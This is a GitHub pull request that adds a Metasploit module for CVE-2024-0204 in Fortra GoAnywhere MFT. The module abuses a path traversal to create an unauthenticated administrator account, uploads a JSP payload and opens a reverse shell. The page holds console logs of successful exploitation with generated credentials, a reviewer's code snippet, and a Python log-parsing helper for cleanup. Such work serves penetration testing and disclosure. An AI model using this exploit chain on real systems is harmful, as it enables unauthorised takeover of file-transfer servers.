
RCE exploit module for CVE-2024-0204 in Fortra GoAnywhere MFT #18762

Merged
merged 7 commits into from
Feb 2, 2024

Conversation


@sfewer-r7 sfewer-r7 commented Jan 29, 2024

fixes #18743

This pull request adds an exploit module for CVE-2024-0204 in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

The vulnerability allows an unauthenticated attacker to create a new administrator account via a path traversal vulnerability. We can leverage this to upload a JSP payload and get a session.

The exploit does not delete the account it creates, as you can't delete yourself after you log in, either via the web interface or the REST API.

The check method uses an undocumented unauthenticated REST API endpoint I found which returns the version number of the target system.

The exploit can target either Linux or Windows, and has a default target of Automatic which will determine both the target's OS and product install location (for the payload upload) at run time.

The exploit uses the FileDropper mixin to register dropped file locations, so they can be deleted once a session is created. This has shown mixed results in practice; some files seem to be locked and cannot be deleted (you get a warning if this happens, which is useful feedback IMHO).

Example

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options 

Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.100.1.30      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8001             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/     yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.100.1.10      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
[*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit

[*] Started reverse TCP handler on 10.100.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
[*] Created account: uchvkpgt:ZindpxggDdvtrxu3
[*] Automatic targeting, detected OS: Linux
[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/EIlMlYdQ.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/EIlMlYdQ.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/uchvkpgt/
[*] Command shell session 4 opened (10.100.1.10:4444 -> 10.100.1.30:49572) at 2024-01-29 17:49:08 +0000

id
uid=1002(gamft) gid=1002(gamft) groups=1002(gamft)
exit
[*] 10.100.1.30 - Command shell session 1 closed.
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) >
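As an added example (not code from this PR or from the Metasploit module), a small Python helper for the engagement write-up: it parses console output in the shape shown above and lists what the module reports leaving behind, the created administrator account and any dropped file whose deletion was not confirmed, and applies the affected-version range the description states. The sample log is constructed from the output format above; the regexes assume those message formats and that the generated password contains no '.' character.

```python
import re

# Constructed sample in the shape of the msfconsole output shown above; the
# regexes below assume these message formats and a password with no '.' in it.
SAMPLE_LOG = """\
[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
[*] Created account: arhzdfmu:KwHjI4HtYPJueyM8. Note: This account will not be deleted by the module.
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/2xgr59m6.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/
"""

VERSION_RE = re.compile(r"GoAnywhere MFT (\d+(?:\.\d+)+)")
ACCOUNT_RE = re.compile(r"Created account: ([^:\s]+):(\S+?)\.?(?:\s|$)")
DROPPED_RE = re.compile(r"Dropped payload: (\S+)")
DELETED_RE = re.compile(r"\[\+\] Deleted (\S+)")
UNKNOWN_RE = re.compile(r"Tried to delete (\S+), unknown result")

def is_affected(version):
    """Affected range as stated in the PR: 6.x from 6.0.1, and 7.x before 7.4.1."""
    parts = tuple(int(p) for p in version.split("."))
    parts += (0,) * max(0, 3 - len(parts))  # pad "7.4" to (7, 4, 0)
    if parts[0] == 6:
        return parts >= (6, 0, 1)
    if parts[0] == 7:
        return parts < (7, 4, 1)
    return False

def leftover_artifacts(log_text):
    """Version seen, affected verdict, created admin account (never deleted) and files whose deletion was unconfirmed."""
    version, accounts, dropped, deleted, unknown = None, [], [], set(), []
    for line in log_text.splitlines():
        if m := VERSION_RE.search(line):
            version = m.group(1)
        elif m := ACCOUNT_RE.search(line):
            accounts.append(m.group(1))  # username only; the password is in the msf creds db
        elif m := DROPPED_RE.search(line):
            dropped.append(m.group(1))
        elif m := DELETED_RE.search(line):
            deleted.add(m.group(1))
        elif m := UNKNOWN_RE.search(line):
            unknown.append(m.group(1))
    return {
        "version": version,
        "affected": is_affected(version) if version else None,
        "accounts_to_remove": accounts,
        # reported "unknown result", or dropped but never reported deleted
        "files_to_verify": sorted(set(unknown) | (set(dropped) - deleted)),
    }
```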

@jheysel-r7 jheysel-r7 self-assigned this Jan 31, 2024
fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")
end

print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")
Contributor


Would you mind adding these credentials to the credentials database so they are stored?

Contributor Author


I added commit b259c5d to address this; it works as follows when I tested it:

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options

Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.100.1.30      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8001             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/     yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
[*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit

[*] Started reverse TCP handler on 10.100.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
[*] Created account: arhzdfmu:KwHjI4HtYPJueyM8. Note: This account will not be deleted by the module.
[*] Automatic targeting, detected OS: Linux
[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/2xgr59m6.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/
[*] Command shell session 1 opened (10.100.1.10:4444 -> 10.100.1.30:42662) at 2024-02-01 19:49:34 +0000

id
uid=1002(gamft) gid=1002(gamft) groups=1002(gamft)
pwd
/opt/HelpSystems/GoAnywhere
exit
[*] 10.100.1.30 - Command shell session 1 closed.
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host         origin       service                                    public    private           realm  private_type  JtR Format  cracked_password
----         ------       -------                                    ------    -------           -----  ------------  ----------  ----------------
10.100.1.30  10.100.1.30  8001/tcp (GoAnywhere MFT Admin Interface)  arhzdfmu  KwHjI4HtYPJueyM8         Password                  

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) >

I also ran the exploit with msfconsole and no database attached, and the exploit works as expected (and no credentials are stored).

I have not used the Report mixin before so would appreciate if this commit could be double checked to ensure I am using the credentials reporting correctly.

Contributor


Looks great Stephen, I tested the store_credentials method in isolation (thank you Spencer for that suggestion) just to be certain and everything is working as expected 👍

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host       origin     service                                    public   private      realm  private_type  JtR Format  cracked_password
----       ------     -------                                    ------   -------      -----  ------------  ----------  ----------------
127.0.0.1  127.0.0.1  8001/tcp (GoAnywhere MFT Admin Interface)  jheysel  SuperSecret         Password

@jheysel-r7 jheysel-r7 merged commit be2d2d6 into rapid7:master Feb 2, 2024
34 checks passed
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 2, 2024
@jheysel-r7

Release Notes

This pull request adds an exploit module for CVE-2024-0204, a path traversal vulnerability that results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

@sfewer-r7 sfewer-r7 deleted the CVE-2024-0204 branch July 4, 2024 08:59
Successfully merging this pull request may close these issues.

Fortra GoAnywhere MFT auth bypass bug (CVE-2024-0204)